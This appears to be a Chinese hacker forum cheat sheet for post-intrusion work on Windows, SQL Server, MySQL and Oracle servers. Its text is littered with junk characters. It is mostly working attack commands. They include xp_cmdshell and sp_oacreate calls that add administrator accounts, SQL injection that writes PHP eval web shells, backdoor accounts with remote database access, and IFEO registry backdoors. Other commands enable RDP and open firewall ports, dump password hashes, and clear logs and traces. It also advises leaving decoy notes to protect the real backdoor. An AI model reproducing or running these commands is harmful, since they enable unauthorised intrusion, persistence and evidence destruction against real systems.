/ d7 o8 ~3 ]" |$ ]/ g+ _. D1.net user administrator /passwordreq:no$ q u' g) q3 _$ `' E, `9 D+ s2 R5 Y
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了+ N& j# P5 }- {' I9 h
2.比较巧妙的建克隆号的步骤8 ~5 a/ }7 ]6 p+ k# U" J. _6 L
先建一个user的用户
1 u7 Y T! C" j然后导出注册表。然后在计算机管理里删掉' N" {/ u8 ^" C3 _) B
在导入,在添加为管理员组
! Z f, N0 j) i6 c- E+ L5 [3.查radmin密码
" L, @0 i7 }# ?reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
( u7 w4 Z$ Z3 Y4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
% Y* L( c5 T" V. B4 p) y建立一个"services.exe"的项9 h) W) D6 ~# r$ [ j. L
再在其下面建立(字符串值)! m, q2 E& {2 P e. O7 O
键值为mu ma的全路径
* w* l% w- `2 o: N1 X8 i" q5.runas /user:guest cmd1 W/ Z0 `- p3 V( H( Q
测试用户权限!
- Z+ s( u! g; o* y x2 d: o6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
3 J# d$ g1 J W/ x7.入侵后漏洞修补、痕迹清理,后门置放:
( x* S% F# L' g0 M. U基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门$ F( i2 ^7 U' K' y' G0 f: T
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c3 \# ?! _3 p& ~" s& A- {
; F' {7 O$ A4 I( Qfor example. _+ M" ]2 ` ^7 I) v0 i
, u8 p7 J/ j+ j# A! u& `
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
! c4 A$ t; Y/ a3 q6 W4 ]4 |6 M8 ~+ v$ E6 W1 L6 z* M
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
+ `; w0 M- ^/ W/ z$ J' f
# e( h/ S+ t+ P7 @9:MSSQL SERVER 2005默认把xpcmdshell 给ON了+ n# g6 S) Z# F/ E3 L! X
如果要启用的话就必须把他加到高级用户模式. S( u- E+ V4 g9 l6 ~
可以直接在注入点那里直接注入
6 q6 @/ l C& |4 \id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
7 W5 r) c8 `) [% u$ Y( C, J然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
! q4 ~& l8 i( e7 P/ U( ^或者5 }5 o7 V. I( K; A+ r
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'( Z* D4 a5 P2 F1 ^* n" O3 Y
来恢复cmdshell。
& A1 ^' P. L9 E- Z% ]1 V
% l% G7 M+ s; ]5 _ V4 x分析器
0 _0 j9 r& `: _% E* h) TEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
3 y# R: z) c) N+ l' U5 q然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll"); t6 Z2 m8 ^/ @
10.xp_cmdshell新的恢复办法
2 A& d4 Z6 W) z; j- Y( M/ G# s, ]; Vxp_cmdshell新的恢复办法# _: a' q9 L. Q8 |8 C v
扩展储存过程被删除以后可以有很简单的办法恢复:
0 X8 z, K3 h% {2 l8 b删除
* n- _' r. S8 [' Edrop procedure sp_addextendedproc1 A+ | z. O, {8 J
drop procedure sp_oacreate$ x& _2 P' S7 C* ~8 P; f9 `
exec sp_dropextendedproc 'xp_cmdshell'. e+ B. z$ }, ?& l2 ]/ ]& d
) U1 Y3 I: E% r
恢复: T6 V1 \0 Z. W: j0 W5 q; z7 |
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
+ [8 F7 ], M3 k* Z4 Kdbcc addextendedproc ("xp_cmdshell","xplog70.dll") K( @9 W+ ? W/ G& v) y# Q
: p; K" _4 n3 E; C a% }' R
这样可以直接恢复,不用去管sp_addextendedproc是不是存在1 V Z6 ~' D7 z. D7 i5 Q# H
: v9 S; R7 g% H) i-----------------------------
2 ^, _! d. E" J
- u4 c( Q" E( N1 \' O- I8 A! A$ V! P: ^删除扩展存储过过程xp_cmdshell的语句:5 u( U% @- E+ p5 }
exec sp_dropextendedproc 'xp_cmdshell'
3 |7 q. a) {8 e$ X- O5 D; P# Q
7 R, E. e r/ ~4 }恢复cmdshell的sql语句
, a+ L9 x3 w3 j3 k0 eexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'7 i' j! ?7 W$ C8 O- B% e
- i: K1 n5 t: R4 [
/ ~6 R; ?- O) ^. i( \7 e开启cmdshell的sql语句
& V* Y9 z! p/ E7 h9 x
9 l4 v6 g; R% Rexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'4 y2 s* ?) [: j9 ~( F. |
& W ]6 `, M" u/ J+ w# x+ I4 t
判断存储扩展是否存在
! U# k$ q5 Z( ]- wselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
% [2 S$ N+ d" ]4 v3 t返回结果为1就ok
9 E7 n3 c' M5 _9 X$ S* e8 H1 K, R: F2 u1 G2 Z) `
恢复xp_cmdshell
& f. A" A3 W pexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
, l& _. q) I" X) x' K# _$ K, h8 t4 M返回结果为1就ok
3 `4 s G6 }& g1 h0 m- s
3 Q7 ~" m+ i6 c5 F6 o. i否则上传xplog7.0.dll
N" Y% Q- b1 X" n4 y% Qexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'! F2 i$ e; H7 M* V, F2 V) S
9 L. ]. R5 S# ~* ~* }6 J" V
堵上cmdshell的sql语句* ^( f5 K) Q/ A4 M" m+ A$ }
sp_dropextendedproc "xp_cmdshel: I& |( _- Q h6 ?+ d
-------------------------+ t) v( y' K% e0 F0 s2 [6 Z8 ?
清除3389的登录记录用一条系统自带的命令:
% G- t, i; K' v, ereg delete "hkcu\Software\Microsoft\Terminal Server Client" /f# f2 O' c# Q7 M
! T2 Z3 ^/ p# s! P2 f, D& C然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件% w: u! d( q- T" z! D
在 mysql里查看当前用户的权限: C' _6 B1 n/ M; G j) r
show grants for + k9 d3 C% x9 h
* `* n% H# x6 A+ O$ b以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
; L9 \& H3 i4 \8 T
# C2 e$ H. ~4 h& X( A( r* K" g3 F6 V& I) }9 n' ]
Create USER 'itpro'@'%' IDENTIFIED BY '123';
3 b( x8 z% X" p* ?* N
1 I3 i7 u: Z) T. _/ y. D$ B8 OGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
+ @0 `5 u- G1 v, U6 R
u' @# }4 G# L7 l( K7 @$ PMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0# o) X0 j4 ]6 N4 H
* d: U" S) K, M( T- R
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;8 n: A ~+ v/ I$ e, C4 u
- h+ k. ?7 T& m: ?; L
搞完事记得删除脚印哟。
8 p( Y, I# C& H% ]7 O$ }9 N3 D
}' [6 @9 f! Z: _0 L8 ?Drop USER 'itpro'@'%';6 T* c. A+ z* Z9 G6 i5 D: `4 _; l/ P
0 k4 T* a; I9 w- g, N* L* p
Drop DATABASE IF EXISTS `itpro` ;# y3 h4 w% b5 v* c3 h
) l- v' M% C O! w) D2 Q; w7 [. T当前用户获取system权限
+ Q2 P1 f% d0 ysc Create SuperCMD binPath= "cmd /K start" type= own type= interact
3 D& j7 c# D, }$ f9 l) v, v2 v8 Psc start SuperCMD7 s0 l5 @! X M
程序代码2 Y8 Z# z% n" ]1 X. F+ q: N/ r
<SCRIPT LANGUAGE="VBScript">
4 u5 H( n2 K5 qset wsnetwork=CreateObject("WSCRIPT.NETWORK")
; |5 D O, Z8 z+ q! T% I' Qos="WinNT://"&wsnetwork.ComputerName
2 R- \, M* {8 f) w* [- a0 S) DSet ob=GetObject(os)/ Y" H7 h$ U4 k& Q2 {7 Z
Set oe=GetObject(os&"/Administrators,group")
0 b( P/ C) X a7 W8 A/ z/ uSet od=ob.Create("user","nosec")
, [+ u5 S/ z! ^- Jod.SetPassword "123456abc!@#"3 T8 b- W$ t0 Q3 `
od.SetInfo
7 T$ N2 g u1 P \- H7 RSet of=GetObject(os&"/nosec",user)
1 _0 E) l. P4 ~! |2 m; ~oe.add os&"/nosec"' f0 \ b6 x* |* A( ]+ ]
</Script>' A* A3 S7 r0 I# R; l7 W6 J
<script language=javascript>window.close();</script>
4 ]/ J0 U2 u/ J5 u# J" G
" p; o$ q9 h* b. U9 l0 @; B
3 m# D: o' V* s3 @3 }7 H" C- ]
" H9 T* p3 O1 p; v* R* i2 D$ a
) C* \0 @4 h; X& Y8 F0 M& @突破验证码限制入后台拿shell/ |! P, x* \2 j8 I# ~
程序代码
2 {4 C& z5 s; C5 W- XREGEDIT4
2 U: d b# Q$ x+ ?3 p$ A( D* S[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
1 m1 J# z$ L; [& G"BlockXBM"=dword:00000000
* m$ B! q1 m) d* q& E# r+ ]3 ?' @8 B, c# J. Z f
保存为code.reg,导入注册表,重器IE
& y- E! j2 C. D7 U, v就可以了
5 L8 Y3 U5 q% b* aunion写马0 o! C' A3 [ U& ^8 A" S& `
程序代码1 C( D1 f4 g, D. d2 e- d
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/* T& d% u+ c* o5 b% n9 C7 {6 h
% M7 F6 H' k7 B/ U
应用在dedecms注射漏洞上,无后台写马
1 v$ z ~. l8 K( n* ^2 Y9 tdedecms后台,无文件管理器,没有outfile权限的时候
% f* a2 P6 Z u% M在插件管理-病毒扫描里3 Z( q( c1 i0 K6 |- T, e" L, H$ H
写一句话进include/config_hand.php里- [0 `! j/ f8 P/ l- m. k
程序代码
; f1 U4 M! G+ m) _* \6 I0 I+ a>';?><?php @eval($_POST[cmd]);?>
- T4 O8 J5 J' g! ~7 F. l3 b) J0 N I" Y0 i. ?4 T& O7 m; p6 l
4 V r2 ?- K2 q! e如上格式
/ e0 j. L0 ^7 W! L) k& K& C
2 `% M1 @5 [! d" k4 I* n4 g5 o4 [oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解' q0 B1 Z3 S* m. B0 T+ T
程序代码
* F+ V) j* T8 i: t7 p3 _select username,password from dba_users;: J* l+ ?0 \* N2 k' i+ l( o7 S1 }
, ], E' v( c( z
: n+ O8 {" f9 D0 ^
mysql远程连接用户0 h. V2 M% k# S4 o8 U9 y( t% K
程序代码
" M v4 `1 N, `" h- @. Y. D& H- S
4 m9 Q( y/ \: x/ h* N. i7 zCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';% l* ?* i9 _- H( [9 M* M( L9 r7 t, i0 t! i
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
+ V! `4 G8 X# i. L' P3 I9 ^$ z! @MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0, g/ C2 _! S( j$ J ^
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
; e |7 E) H7 ~. y
& h/ A6 ^ U. q
. @0 @( J' ]& T$ B, _0 G% _0 ?
" S( G4 g4 E5 x" B: [: b" Y* {0 ~8 Y$ B, Q) I# W
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
# l" |* ~* F) I
+ u% N4 b: T+ [$ s" Y1.查询终端端口
" A! h" s2 E( ~0 D: ?; t/ |3 Z6 m" V- q4 x4 v
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber2 j: N' T& g( {+ e$ \
9 x7 f6 ~, M- B) m
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"6 M5 P+ P# _# {' b8 ^+ n
type tsp.reg
' ?. o9 x8 Z) v+ G4 |
8 Q9 r* V: N! D2 p/ d+ S1 Z2.开启XP&2003终端服务$ J9 ^) X6 G1 Y+ i$ ^' a p9 G, V
' s' m9 k( d' M; p+ G8 P. v# ? u' `" Q4 ?/ a0 y2 K
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f, {; h7 U4 I8 X& ~+ ]- G
/ V, c J5 ?3 t" m- f* y7 [
/ i, z6 |% L- r0 x$ U- YREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f( X. o5 o" ?) ]7 `- k6 p I
( B' [3 C, t4 U1 M3.更改终端端口为20008(0x4E28)
* \: T& v8 `% O
3 E7 q* e7 }! ?% sREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
! J$ t4 l7 n) @) h/ M* A2 |8 q6 ]4 {/ }5 b0 E% v8 y7 W
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f. ?: W) U1 h9 }4 j* U0 T
' V" o7 U% h( z' e. y. V4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制5 B2 d9 w: D+ Q8 J
8 s0 ^% l" [6 l7 @2 m9 NREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
+ d1 a+ [ I2 Y( w/ a
" b' |+ l1 f( n: O' Z @! q; e
! u$ p/ N& F: M% _) ?0 ~7 u5.开启Win2000的终端,端口为3389(需重启)
# [* ^! T( ~! ?& f6 q1 {/ {8 {1 I) Y- j5 \! u9 d' E0 Y
echo Windows Registry Editor Version 5.00 >2000.reg 1 {9 h9 J4 j" T
echo. >>2000.reg& H+ y. F: i$ X
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 1 D) [, k: s! T4 I
echo "Enabled"="0" >>2000.reg
5 d, f( E6 @& S; l- Z9 F Iecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg " a2 D1 z9 W' M& X6 H
echo "ShutdownWithoutLogon"="0" >>2000.reg
9 E8 ^6 p5 }( c. ?& y/ d( Decho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
4 }+ s$ [) U7 w, g Q& |7 a* {7 D* aecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
5 Q! h7 p0 X4 j# v8 Kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg % U! J3 G/ Q! w
echo "TSEnabled"=dword:00000001 >>2000.reg " N' l% Z+ r3 r. O
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg ) `/ z, f4 N" ~/ L1 _
echo "Start"=dword:00000002 >>2000.reg % _7 \! ]# C7 z) K: l
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg - O7 n; v) S" T f7 @
echo "Start"=dword:00000002 >>2000.reg ' g7 _ p% Q: R- y; Z* \ J" r
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
. B/ |. O- K2 P) I! B; Iecho "Hotkey"="1" >>2000.reg 9 [7 f8 m; Y3 z7 e
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
( A( V8 V N9 s$ B+ A* m& I$ x8 ~* b% q7 Recho "ortNumber"=dword:00000D3D >>2000.reg
1 d5 ]5 L, S1 U0 Y2 W! Aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg 7 K3 e' T- B4 Q# X
echo "ortNumber"=dword:00000D3D >>2000.reg
: ]! ^1 R" l/ D9 Q* x# d
& q+ |& k: }, Q) j) @7 w) n6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
$ r6 G7 F! g/ G$ \7 E( n
2 J# w. t7 _9 ^( {@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
0 O; c: r; }2 {' j(set inf=InstallHinfSection DefaultInstall)
& _# y4 Y2 ^" x3 Y% b+ Xecho signature=$chicago$ >> restart.inf
9 u7 ^* e; e0 M" U; Uecho [defaultinstall] >> restart.inf
( f* M2 l; f* u* _6 w, b/ xrundll32 setupapi,%inf% 1 %temp%\restart.inf
0 Z$ _) r* m- K0 w9 r; i8 E8 A4 F
1 N' U2 X8 X# ~9 ]* B9 ]/ V
- y: Y, n% J- c% Q3 E' Q* L7.禁用TCP/IP端口筛选 (需重启)
& q% ^) s+ Y/ ^$ Z/ A7 r- V2 N
* m4 f; u. M- O7 o% `' B4 gREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
5 [! G8 ~( J- D7 h0 y
, Y! D/ R6 s4 _6 X8 \8.终端超出最大连接数时可用下面的命令来连接
. O! ^/ V( p4 ^3 N4 P1 ]+ {& x! L" B9 T6 k9 f/ w$ a. h! L- W
mstsc /v:ip:3389 /console
; J: J$ ?4 x6 B7 S& c& A; A5 \3 H1 x7 ~0 d& p
9.调整NTFS分区权限
+ G5 {4 y5 T- I7 J( v- h- }
F% h6 m& c# i2 L# u+ Qcacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
" [5 z- E( y B0 R9 G. R7 d
6 C/ y7 j$ m9 G0 z) hcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)9 @! @: U, V+ _$ f% J9 v! x
* b. I ]/ B6 N( u/ W% b
------------------------------------------------------: [4 u" x4 T7 |! M
3389.vbs ( M" [( i& |# n3 D2 }
On Error Resume Next
2 k# i& U$ O. C) k9 j, Z& {const HKEY_LOCAL_MACHINE = &H80000002
! q. u0 v( }0 hstrComputer = "."9 W* q# h+ J, Y( R( p* z
Set StdOut = WScript.StdOut
0 K$ U- m; A+ A5 n! @! S6 n7 gSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
+ |9 W3 B: l) u8 ^. |% KstrComputer & "\root\default:StdRegProv")
4 a& \, [9 Z# Y; p+ U, @8 ustrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
3 R1 T1 p F8 |4 o. G) xoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath1 G+ C) h& x! E! p$ L" Y
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"/ F1 A+ W5 c* |/ P& M
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath3 R" |# z# |9 J- F% W K) B
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
9 ?- A5 d$ y. [strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"0 [& Y6 V) \8 { g1 V5 D7 {; H0 r
strValueName = "fDenyTSConnections"
$ n! w: J; r$ f9 R$ w3 }dwValue = 0
6 D2 c4 i$ [) m/ U7 Qoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue' Z, x9 _0 ^. t. X
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"4 ?0 a ~$ H' C" M
strValueName = "ortNumber"
7 k, ~; }4 f& T! a0 h9 K: EdwValue = 3389
' H8 q# _' G0 c9 R* doreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
) Y0 P s# f; P! z" H2 _' CstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp". J1 Q* I& C) Y5 [9 B
strValueName = "ortNumber"
" e- r, T: ^ G. w8 RdwValue = 3389
2 r, U( y, K# Q; Eoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
- \( y- B p' W% y/ Y2 L8 a. oSet R = CreateObject("WScript.Shell") , O* |1 l1 c' P9 J. g
R.run("Shutdown.exe -f -r -t 0") % }6 g" R( h- B( t/ \
' f8 a5 `6 w* _0 C! a删除awgina.dll的注册表键值3 \; W* i4 d; o% q% Z; X
程序代码( W; t8 l+ x$ K9 l5 V, K; K. Q( u
- @+ @+ `8 V" K! Ureg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
2 p0 ^3 v' m( Z, }0 w- Y0 L# N( O
" |1 C& b6 q+ W
/ P2 Y, B+ A! R4 l4 J
$ @# k7 y1 U5 C0 j2 s$ ?! O! J5 N8 T
( d9 }5 K4 z- E1 T程序代码% Y' P5 T9 q5 q; @4 m0 ^
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
1 m) D$ h# [, w3 r" }! F# ]* L- r W, J, P( B* j* Z! Y
设置为1,关闭LM Hash
3 I, x9 h" M5 s% K! K
; q9 `' L+ X3 ?数据库安全:入侵Oracle数据库常用操作命令4 f+ T2 \& |# E7 G( m7 ^# T
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
9 g1 z. l' t0 N1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
( T' Q8 O, |1 l; o# h' `2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
" x3 x7 {/ l* U. d2 A, U, O/ c. o3、SQL>connect / as sysdba ;(as sysoper)或2 f, e8 d$ x3 U1 o; x# E1 @
connect internal/oracle AS SYSDBA ;(scott/tiger)
( d. L6 O+ a a/ dconn sys/change_on_install as sysdba;
$ ~6 l# ?) y; {; `, A. n q4、SQL>startup; 启动数据库实例" K r7 O$ L6 N4 R) k
5、查看当前的所有数据库: select * from v$database;
( U) y& ^% H) L+ [: Aselect name from v$database;
5 b8 t' T9 V9 C$ W- t0 N9 L8 K6、desc v$databases; 查看数据库结构字段
- p8 d) g* o5 v% X! }1 n7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限: {3 }9 R/ d9 w# z; @& a, }& \! u
SQL>select * from V_$PWFILE_USERS;0 _! ^$ U+ `: J: O6 l: A7 N1 r$ f
Show user;查看当前数据库连接用户# c2 H Q3 X `
8、进入test数据库:database test;' R: H) D j; K h/ F( t' Y, a
9、查看所有的数据库实例:select * from v$instance;
8 Z$ X' H2 @$ Z6 B/ z如:ora9i n' t: n; `' M8 h
10、查看当前库的所有数据表:
' P) P1 v' d, g; w0 ]& u0 {SQL> select TABLE_NAME from all_tables;
" o8 j' N1 \" d2 b% }select * from all_tables;! y1 Z* |% U. [( S0 l
SQL> select table_name from all_tables where table_name like '%u%';1 ]/ j1 F% V4 i6 v7 v* C( b
TABLE_NAME6 b: b$ e) j# S0 D) d) t9 Z
------------------------------6 d9 e- E5 ^3 s4 v$ S4 k
_default_auditing_options_8 K% ?8 l8 K+ i, k }! V3 T
11、查看表结构:desc all_tables;
# d; _ X5 z) L: f( \5 _# E ?. ~12、显示CQI.T_BBS_XUSER的所有字段结构:4 @' N c! D# {. v7 m3 c
desc CQI.T_BBS_XUSER;
) Y3 |& H6 z! d; o& }0 j1 u13、获得CQI.T_BBS_XUSER表中的记录:
: E1 E" Q! I- b4 h' W) T: iselect * from CQI.T_BBS_XUSER;
5 l9 h/ h& h @. |14、增加数据库用户:(test11/test)8 ^8 n* M3 S( L# e7 ^: M- s
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp; n9 J7 k, Q" ~
15、用户授权:' _6 K3 [% M& F* N9 T/ U
grant connect,resource,dba to test11; M; x$ Y# a: V( l% H
grant sysdba to test11;
' v) J6 `, E$ E$ ~$ L- g% Icommit;
8 |/ F4 C8 D% u9 e8 N9 e9 i: m4 o16、更改数据库用户的密码:(将sys与system的密码改为test.)1 E) b& @- S9 E2 h* j1 Y0 ?
alter user sys indentified by test;! v* j' ]% X# G8 G* y% d2 d D% e$ q4 `0 N
alter user system indentified by test;
% @- T1 |( A: n! T m4 {" b
) T5 H4 h4 J; A3 QapplicationContext-util.xml
: J- e& E. A( ?5 \$ e8 SapplicationContext.xml
( ^& Z! P( R; W2 rstruts-config.xml
& a; \% O& f, m( ^. Tweb.xml7 R5 ^8 B1 e. `& m$ u9 O
server.xml" q# h+ g e. I4 Z
tomcat-users.xml
- [( X! b w8 Nhibernate.cfg.xml& Z' f. f1 a* U! I% V* L. Q
database_pool_config.xml4 [, y/ } ~/ T+ m) p3 l
& J U$ Z, \, L; V
6 U5 h. S5 b- e1 z4 v% E; Z\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置& L; N* O4 p% o3 Y5 d: g9 |
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
8 v3 @, x+ |* {! i3 k1 i& s& i\WEB-INF\struts-config.xml 文件目录结构) k5 n+ w! t- E6 x+ T; f V
, |6 T7 [8 a' [8 ?- L4 p
spring.properties 里边包含hibernate.cfg.xml的名称) A0 V" M# t, _
/ ^6 M% Z* u7 N5 R3 m! j/ n
3 L6 @ {+ B: s( w2 d0 k) y/ u
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
; F3 k2 [7 T g1 i8 C$ s2 R" y3 j7 @# V" j
如果都找不到 那就看看class文件吧。。 m9 b4 S3 c* s3 i7 `
5 t# E2 B) D+ c- T) Z+ f9 @5 ?2 }$ h测试1:3 X% Q$ ?. Y; I% r6 [3 u5 J1 \ ]* j
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1& N' ~" t% j7 y$ J4 Z
$ H6 v: S6 H2 t) r. `+ N r+ N7 b
测试2:
( \9 x& i1 }7 C3 Z
4 @4 G' |" Y1 n$ t% z4 [create table dirs(paths varchar(100),paths1 varchar(100), id int)* x/ \. o& p) h, I+ Z
$ `) A* e9 o0 M( [, W u& Hdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--" S% c) R! y0 Z# `$ D2 L7 i& d
6 H2 X' ?. e# k, U
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
1 i) l1 w L- {% K9 [1 f5 O, _6 G: K5 D4 G m! {* u1 P
查看虚拟机中的共享文件:
9 C0 {* y0 x' U0 S$ S在虚拟机中的cmd中执行
, }+ t9 X8 D# W. |/ n\\.host\Shared Folders
" b$ b7 u4 z$ @8 I7 r
$ G$ u. m2 o- f acmdshell下找终端的技巧
1 c6 y; x0 S# e1 L: }( z. m找终端: 4 \1 B5 D* X/ ?0 W" ~
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
( g: R' u- v6 U4 o. Y! x* x 而终端所对应的服务名为:TermService ! D: |# W) c* P F0 |: ~
第二步:用netstat -ano命令,列出所有端口对应的PID值!
; i. P; x6 g# [7 R" V6 ]4 q 找到PID值所对应的端口- f: j: z! f1 e3 _& v8 ^6 w
! |! C' [# D9 i) Q9 Y) K0 S. {: x
查询sql server 2005中的密码hash7 n( ^+ O3 U, F3 f
